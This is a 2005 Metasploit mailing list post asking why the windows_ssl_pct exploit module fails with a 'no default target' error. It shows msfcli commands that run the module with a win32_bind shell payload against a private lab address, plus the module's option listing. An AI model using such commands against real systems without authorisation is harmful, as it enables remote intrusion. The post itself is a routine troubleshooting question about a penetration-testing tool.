Metasploit mailing list archives
windows_ssl_pct :: no default target error
From: grep at reflexsecurity.com (Greg Poirier)
Date: Wed, 12 Jan 2005 12:13:02 -0500
Given the following commmand-line and its corresponding msfconsole syntax: ./msfcli windows_ssl_pct RHOST=192.168.151.2 PAYLOAD=win32_bind E I receive the following error: [*] Exploit does not default targets, one must be specified. ./msfcli windows_ssl_pct RHOST=192.168.151.2 PAYLOAD=win32_bind O Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ------------- -------------------------------------- required RHOST 192.168.151.2 The target address required RPORT 443 The target port optional PROTO raw The application protocol (raw or smtp) Payload: Name Default Description -------- -------- ------- ------------------------------------------ required EXITFUNC thread Exit technique: "process", "thread", "seh" required LPORT 4444 Listening port for bind shell Target: Target Not Specified At this point I considered the possibility that RHOST and TARGET were reversed... this proved incorrect: ./msfcli windows_ssl_pct TARGET=192.168.151.2 PAYLOAD=win32_bind E Error: Missing required option: RHOST exploits/windows_ssl_pct.pm shows that GetEnv{'TARGET'} is used to define the $target_idx variable. A simple explanation of the TARGET variable in the $info->{'UserOpts'} hash would be very helpful. Cheers, -- grep "paranoia means having all the facts" --wsb -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature URL: <http://mail.metasploit.com/pipermail/framework/attachments/20050112/8f23f252/attachment.pgp>
Current thread:
- windows_ssl_pct :: no default target error Greg Poirier (Jan 12)
- windows_ssl_pct :: no default target error mmiller at hick.org (Jan 12)